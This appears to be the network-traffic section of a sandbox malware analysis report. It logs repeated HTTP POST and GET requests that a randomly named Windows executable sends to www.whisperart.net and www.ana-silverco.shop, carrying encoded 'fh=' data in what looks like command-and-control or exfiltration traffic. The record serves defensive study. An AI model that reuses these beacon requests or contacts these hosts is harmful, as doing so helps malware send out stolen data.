                                                                                33192.168.2.550016199.59.243.227801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:24:01.029881954 CET783OUTPOST /27s6/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.whisperart.net
                                                                                Origin: http://www.whisperart.net
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.whisperart.net/27s6/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 36 46 6e 4a 70 69 39 56 2f 50 7a 63 4d 30 44 6f 71 6c 42 41 31 6f 4a 52 50 72 2b 48 4a 2b 51 49 64 77 6d 54 63 78 66 4a 35 79 61 4d 5a 6e 4a 7a 76 6b 52 39 78 45 75 5a 6b 7a 38 38 62 6f 52 42 39 46 4d 54 35 64 66 54 59 63 4c 4b 54 79 74 65 71 58 57 4f 76 34 7a 44 6b 70 68 49 52 74 42 6f 37 6f 57 38 74 78 53 50 69 2b 4c 76 48 71 72 4c 56 35 36 63 7a 74 45 75 35 33 4c 31 4d 57 4d 65 5a 45 65 57 72 5a 74 72 48 75 53 31 76 67 50 6e 56 72 45 33 46 50 5a 55 64 54 39 43 36 63 58 54 6c 67 47 71 4f 7a 34 79 2b 72 33 41 76 55 6c 76 4a 48 41 37 49 64 55 4a 6a 37 6d 79 77 6c 71 63 51 79 51 51 30 64 51 3d
                                                                                Data Ascii: fh=6FnJpi9V/PzcM0DoqlBA1oJRPr+HJ+QIdwmTcxfJ5yaMZnJzvkR9xEuZkz88boRB9FMT5dfTYcLKTyteqXWOv4zDkphIRtBo7oW8txSPi+LvHqrLV56cztEu53L1MWMeZEeWrZtrHuS1vgPnVrE3FPZUdT9C6cXTlgGqOz4y+r3AvUlvJHA7IdUJj7mywlqcQyQQ0dQ=
                                                                                Dec 3, 2024 14:24:02.157486916 CET1236INHTTP/1.1 200 OK
                                                                                date: Tue, 03 Dec 2024 13:24:01 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1122
                                                                                x-request-id: 613d471a-d10a-4ac2-9e0f-a2e6b2d52afe
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXp6qAtzgFrrIyjeXUkCtPqzYHoLPwVja6ZiVVYK2s4VTThMsEXjltxbtnWgpVQUbnLKHJC+TAFovXSuqaACMA==
                                                                                set-cookie: parking_session=613d471a-d10a-4ac2-9e0f-a2e6b2d52afe; expires=Tue, 03 Dec 2024 13:39:01 GMT; path=/
                                                                                connection: close
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 58 58 70 36 71 41 74 7a 67 46 72 72 49 79 6a 65 58 55 6b 43 74 50 71 7a 59 48 6f 4c 50 77 56 6a 61 36 5a 69 56 56 59 4b 32 73 34 56 54 54 68 4d 73 45 58 6a 6c 74 78 62 74 6e 57 67 70 56 51 55 62 6e 4c 4b 48 4a 43 2b 54 41 46 6f 76 58 53 75 71 61 41 43 4d 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXp6qAtzgFrrIyjeXUkCtPqzYHoLPwVja6ZiVVYK2s4VTThMsEXjltxbtnWgpVQUbnLKHJC+TAFovXSuqaACMA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Dec 3, 2024 14:24:02.157521963 CET575INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjEzZDQ3MWEtZDEwYS00YWMyLTllMGYtYTJlNmIyZDUyYWZlIiwicGFnZV90aW1lIjoxNzMzMjMyMj


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                34192.168.2.550017199.59.243.227801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:24:03.721452951 CET803OUTPOST /27s6/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.whisperart.net
                                                                                Origin: http://www.whisperart.net
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.whisperart.net/27s6/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 36 46 6e 4a 70 69 39 56 2f 50 7a 63 64 6c 54 6f 78 45 42 41 79 49 4a 53 41 4c 2b 48 43 65 52 44 64 77 71 54 63 77 61 43 35 68 2b 4d 41 43 31 7a 75 6c 52 39 32 45 75 5a 72 54 38 35 56 49 51 44 39 46 77 62 35 59 6e 54 59 66 33 4b 54 32 70 65 71 45 4f 4a 75 6f 79 6c 2f 35 68 4b 63 4e 42 6f 37 6f 57 38 74 79 76 67 69 2b 54 76 48 65 58 4c 57 59 36 62 6f 4e 45 74 6f 33 4c 31 64 6d 4d 61 5a 45 66 7a 72 63 30 2b 48 6f 57 31 76 68 2f 6e 56 35 38 34 50 50 5a 61 5a 54 38 6d 70 5a 6d 46 72 51 36 51 46 78 4a 36 69 4c 6a 64 71 69 55 46 54 6c 49 54 62 39 34 78 7a 6f 75 46 68 56 4c 31 4b 52 41 67 71 4b 48 4c 38 4f 4a 58 47 50 4b 30 7a 33 59 4d 55 4f 44 59 6f 6f 68 37
                                                                                Data Ascii: fh=6FnJpi9V/PzcdlToxEBAyIJSAL+HCeRDdwqTcwaC5h+MAC1zulR92EuZrT85VIQD9Fwb5YnTYf3KT2peqEOJuoyl/5hKcNBo7oW8tyvgi+TvHeXLWY6boNEto3L1dmMaZEfzrc0+HoW1vh/nV584PPZaZT8mpZmFrQ6QFxJ6iLjdqiUFTlITb94xzouFhVL1KRAgqKHL8OJXGPK0z3YMUODYooh7
                                                                                Dec 3, 2024 14:24:04.932269096 CET1236INHTTP/1.1 200 OK
                                                                                date: Tue, 03 Dec 2024 13:24:04 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1122
                                                                                x-request-id: 6d1e2114-38c0-4e82-98a2-8c8b5335f86d
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXp6qAtzgFrrIyjeXUkCtPqzYHoLPwVja6ZiVVYK2s4VTThMsEXjltxbtnWgpVQUbnLKHJC+TAFovXSuqaACMA==
                                                                                set-cookie: parking_session=6d1e2114-38c0-4e82-98a2-8c8b5335f86d; expires=Tue, 03 Dec 2024 13:39:04 GMT; path=/
                                                                                connection: close
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 58 58 70 36 71 41 74 7a 67 46 72 72 49 79 6a 65 58 55 6b 43 74 50 71 7a 59 48 6f 4c 50 77 56 6a 61 36 5a 69 56 56 59 4b 32 73 34 56 54 54 68 4d 73 45 58 6a 6c 74 78 62 74 6e 57 67 70 56 51 55 62 6e 4c 4b 48 4a 43 2b 54 41 46 6f 76 58 53 75 71 61 41 43 4d 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXp6qAtzgFrrIyjeXUkCtPqzYHoLPwVja6ZiVVYK2s4VTThMsEXjltxbtnWgpVQUbnLKHJC+TAFovXSuqaACMA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Dec 3, 2024 14:24:04.932296038 CET575INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmQxZTIxMTQtMzhjMC00ZTgyLTk4YTItOGM4YjUzMzVmODZkIiwicGFnZV90aW1lIjoxNzMzMjMyMj


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                35192.168.2.550018199.59.243.227801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:24:06.389826059 CET1820OUTPOST /27s6/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.whisperart.net
                                                                                Origin: http://www.whisperart.net
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.whisperart.net/27s6/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 36 46 6e 4a 70 69 39 56 2f 50 7a 63 64 6c 54 6f 78 45 42 41 79 49 4a 53 41 4c 2b 48 43 65 52 44 64 77 71 54 63 77 61 43 35 68 32 4d 41 55 42 7a 75 43 39 39 33 45 75 5a 69 7a 38 34 56 49 52 62 39 46 59 66 35 59 6a 70 59 61 37 4b 53 54 39 65 36 6c 4f 4a 6b 6f 79 6c 67 70 68 4a 52 74 42 39 37 6f 6d 34 74 78 58 67 69 2b 54 76 48 59 7a 4c 42 5a 36 62 76 39 45 75 35 33 4c 78 4d 57 4e 46 5a 48 76 46 72 64 41 75 48 59 32 31 76 42 76 6e 53 4d 6f 34 56 50 5a 59 65 54 38 2b 70 5a 6a 62 72 54 66 72 46 30 64 51 69 4a 7a 64 72 7a 49 54 49 48 51 32 4d 4c 30 75 39 4b 2b 45 6a 42 33 4c 4f 6e 55 4d 76 71 6e 4d 68 39 5a 6f 46 49 47 31 35 6c 42 5a 50 71 6a 77 75 73 41 34 6a 76 74 61 5a 51 55 64 51 47 4d 2b 38 50 79 7a 75 45 54 72 6a 69 31 51 4b 39 44 76 47 55 44 71 31 6b 31 72 36 79 48 4f 76 51 49 34 67 71 78 35 55 70 58 76 6b 56 5a 6f 65 44 39 79 63 6d 41 6e 32 53 42 72 54 38 49 43 6e 73 64 51 44 5a 32 45 2f 69 66 6b 41 2b 2f 4d 42 38 44 59 6b 76 52 76 66 77 32 46 6f 5a 46 6a 68 41 59 65 32 79 47 31 33 7a 38 [TRUNCATED]
                                                                                Data Ascii: fh=6FnJpi9V/PzcdlToxEBAyIJSAL+HCeRDdwqTcwaC5h2MAUBzuC993EuZiz84VIRb9FYf5YjpYa7KST9e6lOJkoylgphJRtB97om4txXgi+TvHYzLBZ6bv9Eu53LxMWNFZHvFrdAuHY21vBvnSMo4VPZYeT8+pZjbrTfrF0dQiJzdrzITIHQ2ML0u9K+EjB3LOnUMvqnMh9ZoFIG15lBZPqjwusA4jvtaZQUdQGM+8PyzuETrji1QK9DvGUDq1k1r6yHOvQI4gqx5UpXvkVZoeD9ycmAn2SBrT8ICnsdQDZ2E/ifkA+/MB8DYkvRvfw2FoZFjhAYe2yG13z8tNk9WDmfJGcGGyknCABlKXwYR1BITKtAlg9P7rGCVcFbyBh4KUvLAdK2bULdkLClS6c26N6dRr+fT4cMXmktxoDphwprxrXCuNyaTHw4C2772BMwZSQMfArjYOi8H6tGEaU6vZHH02bUTzSzDW/rGwyLSAhhL9sB1Wal/rVHw1DozvQalLlrJ5iEbw1T0SxpJ785/iMP/J0xglxm73uyuo3CP57ZH+b/tgmvcOXV7jnSc8cuYLFKKGV2VwfA/+m8A8RM5ms9SRL+v2TqG9RDeQco1C7ZeCSJHET1Cj+b7K8rNU23g+scUQFLarU7gMQgGQUlu5fcKgB8tYBmS/DTrcwFQFhgarQ5oDklu74i+bsabDXQSXqPz22ce3/TVkovSVEhzYVhbpVV2dYxLIgFAULvdibYHU4+bR7y/QUnVbQAJj+n2stfGvpTib4BI6fCdUWUTWw1zP8LHBHXnrV/mtMmHn+o7WMhwIvOY8kpm8WbCxBIADQRM2l1J9MxuCWOavH25tj6ePdOdadsFwhCaSecDjliSLblml6QetrKbXdj5ZhOCuSTX0uFj+sKRpWW0FA6O/Z2FHfjInMjo8k+AjiIBfxhon0vqgLzB8CUr9z7NPT4xBJ0O/0e1eF5p0S4NDpQxDzTK1uAOk5/E8AyPbk8xeyV/ul62L [TRUNCATED]
                                                                                Dec 3, 2024 14:24:07.523653984 CET1236INHTTP/1.1 200 OK
                                                                                date: Tue, 03 Dec 2024 13:24:06 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1122
                                                                                x-request-id: 46f11d6c-030e-4a82-b155-dc315b2430e2
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXp6qAtzgFrrIyjeXUkCtPqzYHoLPwVja6ZiVVYK2s4VTThMsEXjltxbtnWgpVQUbnLKHJC+TAFovXSuqaACMA==
                                                                                set-cookie: parking_session=46f11d6c-030e-4a82-b155-dc315b2430e2; expires=Tue, 03 Dec 2024 13:39:07 GMT; path=/
                                                                                connection: close
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 58 58 70 36 71 41 74 7a 67 46 72 72 49 79 6a 65 58 55 6b 43 74 50 71 7a 59 48 6f 4c 50 77 56 6a 61 36 5a 69 56 56 59 4b 32 73 34 56 54 54 68 4d 73 45 58 6a 6c 74 78 62 74 6e 57 67 70 56 51 55 62 6e 4c 4b 48 4a 43 2b 54 41 46 6f 76 58 53 75 71 61 41 43 4d 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXp6qAtzgFrrIyjeXUkCtPqzYHoLPwVja6ZiVVYK2s4VTThMsEXjltxbtnWgpVQUbnLKHJC+TAFovXSuqaACMA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Dec 3, 2024 14:24:07.523698092 CET575INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDZmMTFkNmMtMDMwZS00YTgyLWIxNTUtZGMzMTViMjQzMGUyIiwicGFnZV90aW1lIjoxNzMzMjMyMj


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                36192.168.2.550019199.59.243.227801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:24:09.053472996 CET526OUTGET /27s6/?jnGlY=dHeXwH1PkJZDr&fh=3HPpqXJ7+KzZdUbztAJQoIdlDoC5J9hYXz+VcheInCeAf0Mmt05i/k62iF4aOsJa+VYW+vyKTPXBSx5msm7TgI/vrMgSa7d6ydGcyUbb1sGAEKWqA4+Ev4Y2u0PwcF1BFA== HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.whisperart.net
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:24:10.186819077 CET1236INHTTP/1.1 200 OK
                                                                                date: Tue, 03 Dec 2024 13:24:09 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1502
                                                                                x-request-id: dc2796b4-e608-465f-ad20-ee7a96647953
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cfIEHnUSANXOUEed+RaZ6iD5sbemfVtRL5MNemqWfgtTuwncFnZengjAkT5Gvoga3JJ7s2HyTGAQr0wNX1MDgg==
                                                                                set-cookie: parking_session=dc2796b4-e608-465f-ad20-ee7a96647953; expires=Tue, 03 Dec 2024 13:39:10 GMT; path=/
                                                                                connection: close
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 66 49 45 48 6e 55 53 41 4e 58 4f 55 45 65 64 2b 52 61 5a 36 69 44 35 73 62 65 6d 66 56 74 52 4c 35 4d 4e 65 6d 71 57 66 67 74 54 75 77 6e 63 46 6e 5a 65 6e 67 6a 41 6b 54 35 47 76 6f 67 61 33 4a 4a 37 73 32 48 79 54 47 41 51 72 30 77 4e 58 31 4d 44 67 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cfIEHnUSANXOUEed+RaZ6iD5sbemfVtRL5MNemqWfgtTuwncFnZengjAkT5Gvoga3JJ7s2HyTGAQr0wNX1MDgg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Dec 3, 2024 14:24:10.186953068 CET955INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGMyNzk2YjQtZTYwOC00NjVmLWFkMjAtZWU3YTk2NjQ3OTUzIiwicGFnZV90aW1lIjoxNzMzMjMyMj


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                37192.168.2.550020172.67.156.195801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:24:15.798885107 CET792OUTPOST /ez1t/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.ana-silverco.shop
                                                                                Origin: http://www.ana-silverco.shop
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.ana-silverco.shop/ez1t/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 33 64 73 34 76 4c 2b 52 33 2f 36 5a 57 79 52 38 7a 68 64 2f 4d 59 71 4f 7a 4a 39 4c 33 68 37 76 43 37 4f 35 67 4f 39 37 35 53 74 58 63 54 59 4c 2b 70 65 4f 54 37 50 41 50 79 33 31 4c 73 78 31 58 79 74 69 43 4b 42 4d 35 61 77 34 35 4c 70 7a 50 63 54 38 48 79 78 6c 53 2f 66 53 58 79 41 70 7a 48 6a 67 4e 51 6b 47 57 71 39 4c 57 64 45 5a 63 62 33 39 4e 34 70 33 45 63 39 69 78 45 44 56 69 4c 6f 2f 4d 75 57 38 36 4a 42 70 56 36 35 2f 43 39 31 62 68 6a 63 55 72 53 52 4d 6c 69 44 6a 54 59 44 65 37 38 43 71 70 6a 4c 75 4c 50 4b 79 41 6b 44 4a 68 67 41 6f 39 70 55 38 6c 6e 65 4f 74 50 61 76 32 55 30 3d
                                                                                Data Ascii: fh=3ds4vL+R3/6ZWyR8zhd/MYqOzJ9L3h7vC7O5gO975StXcTYL+peOT7PAPy31Lsx1XytiCKBM5aw45LpzPcT8HyxlS/fSXyApzHjgNQkGWq9LWdEZcb39N4p3Ec9ixEDViLo/MuW86JBpV65/C91bhjcUrSRMliDjTYDe78CqpjLuLPKyAkDJhgAo9pU8lneOtPav2U0=
